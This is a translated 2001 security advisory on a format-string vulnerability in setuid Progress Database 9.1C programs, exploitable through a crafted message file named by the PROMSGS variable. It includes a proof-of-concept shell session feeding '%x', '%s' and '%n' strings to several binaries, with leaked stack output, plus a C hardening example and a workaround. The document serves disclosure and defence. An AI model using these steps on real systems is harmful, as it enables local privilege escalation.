
Security Research

Security Vulnerabilities
Progress Database Format String Vulnerability

Release date: 2001-11-02
Update date: 2001-11-05

Affected systems:

Progress Database 9.1C
   - HP HP-UX 11.0
   - IBM AIX 4.3.3
   - RedHat Linux 6.2
   - RedHat Linux 7.0
   - RedHat Linux 7.1
   - S.u.S.E. Linux 7.2
   - Sun Solaris 2.6

Description:

BUGTRAQ ID: 3502
CVE(CAN) ID: CAN-2001-1129

Progress Database is a commercial database product released and maintained by
Progress Software. The database has a security issue that may allow a local
attacker to escalate privileges.

Progress Database has a format string vulnerability. Many programs in the
database rely on the environment variable "PROMSGS" to locate the message file
they load. By carefully constructing a file that contains format strings, an
attacker can, when a setuid program that reads the file named by "PROMSGS" is
run, overwrite arbitrary process memory and thereby escalate privileges.

<*Source: KF (dotslash@snosoft.com)
  Link: http://archives.neohapsis.com/archives/bugtraq/2001-11/0011.html
*>
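As an added illustration (not code from the original advisory or from Progress), the block below shows one way a message formatter of this kind can be hardened: a template read from a file named by an environment variable is checked against the conversions the caller expects before it ever reaches vsnprintf, so bytes from the file can never act as a format string on their own. The layout of the real promsgs file, the function names and the "expected signature" string are assumptions made for the example.

```c
#include <stdarg.h>
#include <stdio.h>
#include <string.h>

/* Hypothetical validator (added example, not Progress code): a template read
 * from an untrusted message file may only contain the conversions the caller
 * expects, in order ("ds" = one %d then one %s).  "%%" is allowed; "%n",
 * "*" widths/precisions and positional "%1$" are rejected. Returns 1 if ok. */
int template_is_safe(const char *tmpl, const char *expected)
{
    size_t n = 0;
    for (const char *p = tmpl; *p; p++) {
        if (*p != '%')
            continue;
        p++;
        if (*p == '%')                          /* literal percent sign */
            continue;
        while (*p && strchr("-+ #0", *p))       /* flags */
            p++;
        while (*p >= '0' && *p <= '9')          /* fixed width only */
            p++;
        if (*p == '.')                          /* fixed precision only */
            for (p++; *p >= '0' && *p <= '9'; p++)
                ;
        while (*p == 'l' || *p == 'h')          /* length modifiers */
            p++;
        if (*p == '\0' || *p == 'n' || *p == '*' || *p == '$')
            return 0;                           /* write, dynamic or positional */
        if (n >= strlen(expected) || expected[n] != *p)
            return 0;                           /* unexpected or extra conversion */
        n++;
    }
    return n == strlen(expected);               /* every expected argument used */
}

/* Only a validated template ever reaches vsnprintf; a rejected one is reported
 * as data, so bytes from the message file can never act as a format string. */
int format_message(char *out, size_t outsz, const char *tmpl,
                   const char *expected, ...)
{
    va_list ap;
    if (!template_is_safe(tmpl, expected)) {
        snprintf(out, outsz, "Unable to format message: template rejected");
        return 0;
    }
    va_start(ap, expected);
    vsnprintf(out, outsz, tmpl, ap);
    va_end(ap);
    return 1;
}
```

Removing the setuid bit, as the workaround below advises, is still the right short-term step; this check only shows what a code-level fix has to enforce.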


Test method:

Warning

The following program (method) may be offensive in nature and is provided for security research and teaching purposes only. Users assume all risk!


KF (dotslash@snosoft.com) provided the following test code:
[elguapo@linux bin]$ echo blah > file
[elguapo@linux bin]$ export PROMSGS=./file
[elguapo@linux bin]$ ./_probuild
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 290
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 96
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 24
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912

Test to make sure they fixed my original hole with the buffer overflows.
(looks fine)

[elguapo@linux bin]$ echo `perl -e 'print "A" x 20000'` > file
[elguapo@linux bin]$ ./_probuild
Error formatting messaage 96.  Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24.  Message file is corrupt.
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
A
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912

Well if you use a format string instead of an A we get much better
results.

[elguapo@linux bin]$ echo `perl -e 'print "%x" x 9000'` > file
[elguapo@linux bin]$ ./_probuild
Error formatting messaage 96.  Message file is corrupt.
0x00x00x3e0x83c63500xbffff81c0x10x00x8062d350x3cc6140x00xbffffd4f0x782578250x782
578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff7340x806
18450x00x83e3ec00x83e3ec00x83c7b200x900x83c63500xbffff81c0x10xbffff66c0x00x401e5
f2c0x10000x401e44a00xbffff6680x4013f2bd0x10000x401e5f2c0xbffff7180x4013f2aa%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24.  Message file is corrupt.
0x837a70e0x83c63500x83e970c0x00xbffff6240x807784b0x40x83e95b00x83c63500xbffff81c
0x00x202020200x00x323532390x202020360x525820200x584852410x4d4136500x59444d4d0x51
48004d0xbffff5440x83e3ec00xbffff6c40x83166430xbffff5440xbffff6040xc00xbffff5440x
83e3ec00xbffff5440x83e3ec00x83c63500x00x83e3ec00x50x2000x8a0xbffff5ad0x920xbffff
56d%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912


[elguapo@linux bin]$ echo `perl -e 'print "%s" x 9000'` > file
[elguapo@linux bin]$ ./_probuild
Error formatting messaage 96.  Message file is corrupt.
Error formatting messaage 49.  Message file is corrupt.
Error formatting messaage 49.  Message file is corrupt.
Error formatting messaage 49.  Message file is corrupt.
Error formatting messaage 49.  Message file is corrupt.
Error formatting messaage 49.  Message file is corrupt.
Error formatting messaage 49.  Message file is corrupt.
Error formatting messaage 49.  Message file is corrupt.
Error formatting messaage 49.  Message file is corrupt.
Error formatting messaage 49.  Message file is corrupt.
Error formatting messaage 49.  Message file is corrupt.
rcurctr overflow reading promsgs file.
(note the overflow msg)

[elguapo@linux bin]$ echo `perl -e 'print "%n" x 9000'` > file
[elguapo@linux bin]$ ./_probuild
Error formatting messaage 96.  Message file is corrupt.
0(tty)0(tty)6225424-20201(tty)0(tty)11573-148280(tty)-68928197281972819728197281
972819728197-2011-225262130(tty)16064160643152014425424-20201(tty)-24520(tty)243
64409617568-2456-3395409624364-2280-3414%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24.  Message file is corrupt.
-2277025424-268680(tty)-2524307954-2721625424-20200(tty)82240(tty)12857824682242
1057139041978977-274816064-236426179-2748-2556192-274816064-274816064254240(tty)
160645512138-2643146-2707%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912

I am sure you get the idea...

ALL suids in the dlc/bin dir are affected
[elguapo@linux bin]$ ./_dbutil
Error formatting messaage 96.  Message file is corrupt.
0x00x00x3e0x81159280xbffff77c0x00x00x805ec350x11cdf40x00xbffffd530x782578250x782
578250x782578250x782578250x782578250x782578250x782578250xbffff7250xbffff72c0x805
43750x00x81222a00x81222a00x81161c00x900x81159280xbffff77c0x00x00x40015b980x7c304
040x40012b4b0xbffff7000x40015a400x804bb1b0x00x10x400c4a4c0x400227c8%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24.  Message file is corrupt.
0x80fd96e0x81159280x81271340x00xbffff61c0x806540b0x40x8126fd80x81159280xbffff77c
0x00x804daea0x00x81222a00x10x81159280x2080xbffff7480xdff00000x00x00x00x616441740
x532f0x00x00xbffff7800x00x4e2069720x2020766f0x333120320x3a33313a0x322031310xa313
0300x8000ff000x80b00d0c0x3900ffb00x2043312e0x202020200x20202020%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
[elguapo@linux bin]$ ./_mprosrv
14:03:13 Error formatting messaage 96.  Message file is corrupt.
14:03:13
0x00x00x3e0x812f6280xbffff82c0x10x00x3f0xfff5e40x00xbffffd510x782578250x78257825
0x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff7200x80582250
x00x813e8c00x813e8c00x81300200x900x812f6280xbffff82c0x10x400003d40x400157e00x80x
40022c140x80x400c816c0x10x00x400229240xc0b8fae0x400227b8%
14:03:13 errno=0 reading promsgs file, it may have been deleted.
14:03:13 Unable to format message number 940
[elguapo@linux bin]$ ./_mprshut
Error formatting messaage 96.  Message file is corrupt.
0x00x00x3e0x81802500xbffff82c0x10x00x805af750x1858740x00xbffffd510x782578250x782
578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff6a00x805
87650x00x819b8c00x819b8c00x8180d800x900x81802500xbffff82c0x10x00x00x00x00x00x00x
00x00x00x00x0%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 940
[elguapo@linux bin]$ ./_proapsv
14:03:33 02 Nov 2001
  Error formatting messaage 96.  Message file is corrupt.
14:03:33 02 Nov 2001

0x00x00x3e0x842f7f00xbffff8300xbffff82c0x00x80645050x435d140x00xbffffd510x78
2578250x782578250x782578250x782578250x782578250x782578250x782578250xbffff825
0xbffff4180x80630150x00x84573200x84573200x84312200x900x842f7f00x00xbffff82c0
x40015a400x400154140x40015a400x805527a0xbffff3680x4000d3600x40015b940x40022c
900x70x00x180%

[elguapo@linux bin]$ ./_progres
Error formatting messaage 96.  Message file is corrupt.
0x00x00x3e0x840eaf00xbffff82c0x10x00x80646750x414ff40x00xbffffd510x782578250x782
578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff7440x806
31850x00x842d1200x842d1200x84105000x900x840eaf00xbffff82c0x10xbffff67c0x00x401e5
f2c0x10000x401e44a00xbffff6780x4013f2bd0x10000x401e5f2c0xbffff7280x4013f2aa%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24.  Message file is corrupt.
0x83bc8ce0x840eaf00x843296c0x00xbffff6340x807b0fb0x40x84328100x840eaf00xbffff82c
0x00x202020200x00x323532390x202020360x525820200x584852410x4d4136500x59444d4d0x51
48004d0xbffff5540x842d1200xbffff6d40x83587c30xbffff5540xbffff6140xc00xbffff5540x
842d1200xbffff5540x842d1200x840eaf00x00x842d1200x50x2000x8a0xbffff5bd0x920xbffff
57d%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
[elguapo@linux bin]$ ./_proutil
\Error formatting messaage 96.  Message file is corrupt.
0x00x00x3e0x81ae9480xbffff82c0x10x00x80595d50x1b3f340x00xbffffd510x782578250x782
578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff7200x805
80e50x00x81d77200x81d77200x81af4400x900x81ae9480xbffff82c0x10x40015b940x6dcac560
x40012b4b0xbffff6f00x40015a400x804cdee0x400c5a4c0x400227c80x400c255c0x400227c80x
0%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 6063
Error formatting messaage 24.  Message file is corrupt.
0x817912e0x81ae9480x81dc5b40x00xbffff6100x806ea1b0x40x81dc4580x81ae9480xbffff82c
0x00x202020200x00x323532390x202020360x525820200x584852410x4d4136500x59444d4d0x51
48004d0xbffff5300x81d77200xbffff6b00x816cdd30xbffff5300xbffff5f00xc00xbffff5300x
81d77200xbffff5300x81d77200x81ae9480x00x81d77200x50x2000x8a0xbffff5990x920xbffff
559%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 912
[elguapo@linux bin]$ ./_rfutil
Error formatting messaage 96.  Message file is corrupt.
0x00x00x3e0x812d0080xbffff82c0x10x00x80586b50x1324740x00xbffffd530x782578250x782
578250x782578250x782578250x782578250x782578250x782578250xbffff8250xbffff71c0x805
71c50x00x81433e00x81433e00x812d9800x900x812d0080xbffff82c0x10x40015b940x6dcac560
x40012b4b0xbffff6ec0x40015a400x804c3a70x400c5a4c0x400227c80x400c255c0x400227c80x
bffff67c%
errno=0 reading promsgs file, it may have been deleted.
Unable to format message number 940
[elguapo@linux bin]$ ./prolib
Error formatting messaage 96.  Message file is corrupt.
0x00x00x3e0x806c4480x806e4ac0xbffff5fc0x00x00x00x00xbffffd550x782578250x78257825
0x782578250x782578250x782578250x782578250x782578250x7250xbffff3cc0x804b5590x00x8
06c4480x806e4ac0x7970x00x806e4ac0x00x00x00x00x00x00x00x00x00x00x00x00x0%errno=0
reading promsgs file, it may have been deleted.
Unable to format message number 1943

Recommendations:

Temporary workaround:

If you cannot install a patch or upgrade immediately, NSFOCUS recommends the following measures to reduce the threat:

* Temporarily remove the setuid bit from the affected programs

Vendor patch:

The vendor has not yet provided a patch or upgrade. We recommend that users of this software monitor the vendor's home page for the latest version:
http://www.progress.com/

This security advisory was translated and compiled by NSFOCUS. All rights reserved; reproduction without permission is prohibited.